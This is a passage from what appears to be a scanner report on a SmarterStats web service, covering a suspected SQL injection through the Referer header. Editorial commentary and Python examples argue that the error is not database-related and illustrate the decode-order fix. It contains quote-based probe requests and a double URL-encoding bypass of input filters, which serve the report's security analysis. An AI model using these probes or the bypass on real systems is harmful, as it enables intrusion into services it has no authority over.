<pre>GET /Services/SiteAdmin.asmx/GetSiteStatus?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSiteStatus HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

</span>









</body>
</html>

2.8. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Reviewing it here: the error page in Response 1 is the ASP.NET unhandled-exception page for a System.Xml.Schema.XmlSchemaException raised inside System.Xml.Serialization.XmlSchemas.Compile, called from ASP.defaultwsdlhelpgenerator_aspx.Page_Load, which is the framework's built-in help page that renders ?op=AddSite. No System.Data frame and no database error text appears anywhere in the trace, and the second request (Referer ending in %2527%2527) simply received the normal help page a second later. The error-then-no-error pattern the scanner keys on is present, but the error comes from schema compilation in the help-page generator, not from a query, so this finding needs a database-specific error or a blind-injection check before it is treated as SQL injection.

The scanner also reports that the application attempts to block SQL injection attacks but that this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. Given where the exception originates, an intermittent failure in the help-page generator is equally consistent with what was observed.
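The scanner text asks the reader to review the error message before treating the finding as SQL injection, and the page in Response 1 is an ASP.NET unhandled-exception page whose exception type and stack frames can be checked mechanically. The Python below is an added example for this editorial pass, not part of the original report and not SmarterStats code: it extracts the exception type, message and stack frames from such a page and reports whether any of them point at a database call. The sample pages are constructed from the exception lines captured in this report for issues 2.8 and 2.9 (trimmed to what the parser reads), plus one invented SqlException page for contrast; the exception-type and message lists are ordinary ADO.NET types and common database driver messages, not anything observed on this host.

```python
import re

# Constructed sample inputs. The first two are the exception line and the top
# of the stack trace from the ASP.NET error pages captured in this report for
# issues 2.8 and 2.9, trimmed to what the parser reads. The third is an
# invented page (not from SmarterStats) showing what a real database error
# surfacing from an ADO.NET call would look like.
PAGE_2_8 = """<html><head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
</head><body>
<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>
<pre>
[XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></body></html>"""

PAGE_2_9 = """<html><head>
<title>Collection was modified; enumeration operation may not execute.</title>
</head><body>
<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>
<pre>
[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
</pre></body></html>"""

PAGE_SQL_MADE_UP = """<html><head>
<title>Unclosed quotation mark after the character string ''.</title>
</head><body>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.<br><br>
<pre>
[SqlException: Unclosed quotation mark after the character string ''.]
System.Data.SqlClient.SqlCommand.ExecuteReader() +100
Example.SessionStore.Lookup(String hash) +50
</pre></body></html>"""

# "Exception Details: </b>Type.Name: message<br>" as ASP.NET renders it.
EXC_RE = re.compile(r"Exception Details:\s*</b>\s*([\w.]+):\s*(.*?)<br>", re.S)
# One stack frame per line: "Namespace.Type.Method(args) +offset".
FRAME_RE = re.compile(r"^\s*([A-Za-z_][\w.]*)\([^)]*\)\s*\+\d+", re.M)

# Common ADO.NET / driver exception types and error strings (assumption: a
# representative list, extend for the database actually in use).
DB_EXCEPTION_TYPES = {
    "System.Data.SqlClient.SqlException",
    "System.Data.OleDb.OleDbException",
    "System.Data.Odbc.OdbcException",
    "System.Data.SQLite.SQLiteException",
    "MySql.Data.MySqlClient.MySqlException",
}
DB_MESSAGE_MARKERS = (
    "unclosed quotation mark",                      # SQL Server
    "incorrect syntax near",                        # SQL Server
    "syntax error in string in query expression",   # Jet / Access
    "you have an error in your sql syntax",         # MySQL
    "unterminated quoted string",                   # PostgreSQL
)


def parse_aspnet_error(body):
    """Return (exception_type, message, [frames innermost-first])."""
    m = EXC_RE.search(body)
    exc_type, message = (m.group(1), m.group(2).strip()) if m else (None, "")
    return exc_type, message, FRAME_RE.findall(body)


def classify(body):
    """Say where the exception was thrown and whether anything in the page
    is evidence of a database error (type, message text, or a frame in
    System.Data)."""
    exc_type, message, frames = parse_aspnet_error(body)
    return {
        "exception": exc_type,
        "thrown_in": frames[0] if frames else None,
        "app_frame": next((f for f in frames if not f.startswith("System.")), None),
        "db_evidence": (
            exc_type in DB_EXCEPTION_TYPES
            or any(mk in message.lower() for mk in DB_MESSAGE_MARKERS)
            or any(f.startswith("System.Data.") for f in frames)
        ),
    }


def verdict(body):
    c = classify(body)
    if c["db_evidence"]:
        return "database error: pursue as SQL injection"
    return "non-database exception in %s: not evidence of SQL injection" % (
        c["app_frame"] or c["thrown_in"]
    )


if __name__ == "__main__":
    for name, page in (("2.8", PAGE_2_8), ("2.9", PAGE_2_9), ("made-up", PAGE_SQL_MADE_UP)):
        print(name, "->", verdict(page))
```

Run against the two captured pages the verdict is "non-database exception in ASP.defaultwsdlhelpgenerator_aspx.Page_Load"; only the invented SqlException page is flagged. The same parser can be pointed at every 500 response in a scan to separate scanner heuristics from findings with a database behind them.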

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
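To make the decode-order point concrete, here is an added example (not from the original report and not SmarterStats code) of the three orderings the remediation text contrasts: validate between two decodes, decode once and validate, or finish decoding and then validate. The blocklist is a constructed stand-in for whatever filter the scanner believes is present; the probe is the Referer value from Request 1 below.

```python
from urllib.parse import unquote

# Constructed stand-in for a naive SQL-injection blocklist.
BLOCKED = ("'", '"', ";", "--")


def has_blocked_chars(value):
    return any(token in value for token in BLOCKED)


def vulnerable_handler(raw_header):
    """The ordering the finding describes: the web server URL-decodes once,
    the application validates that value, then decodes it a second time
    before using it. Validation therefore runs on a non-canonical form."""
    once = unquote(raw_header)          # the web server's decode
    if has_blocked_chars(once):
        return "blocked"
    twice = unquote(once)               # redundant application-side decode
    return "used:" + twice


def fixed_no_second_decode(raw_header):
    """Remediation option 1: drop the redundant decode, so the value that
    was validated is exactly the value that is used."""
    once = unquote(raw_header)
    if has_blocked_chars(once):
        return "blocked"
    return "used:" + once


def fixed_validate_after_canonicalisation(raw_header):
    """Remediation option 2: if the application really must decode again,
    finish every decoding step first and validate the final form."""
    canonical = unquote(unquote(raw_header))
    if has_blocked_chars(canonical):
        return "blocked"
    return "used:" + canonical


# The Referer value from Request 1, as it arrives on the wire.
PROBE = "http://www.google.com/search?hl=en&q=%2527"

if __name__ == "__main__":
    for handler in (vulnerable_handler, fixed_no_second_decode,
                    fixed_validate_after_canonicalisation):
        print(handler.__name__, "->", handler(PROBE))
```

A plain %27 is stopped by all three; %2527 passes the vulnerable handler as a bare quote, is used harmlessly as the literal text %27 by the first fix, and is blocked outright by the second.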

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:40 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19931
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSite</h2>
<p class="intro">Adds a site to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="LogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneID:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;/AddSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
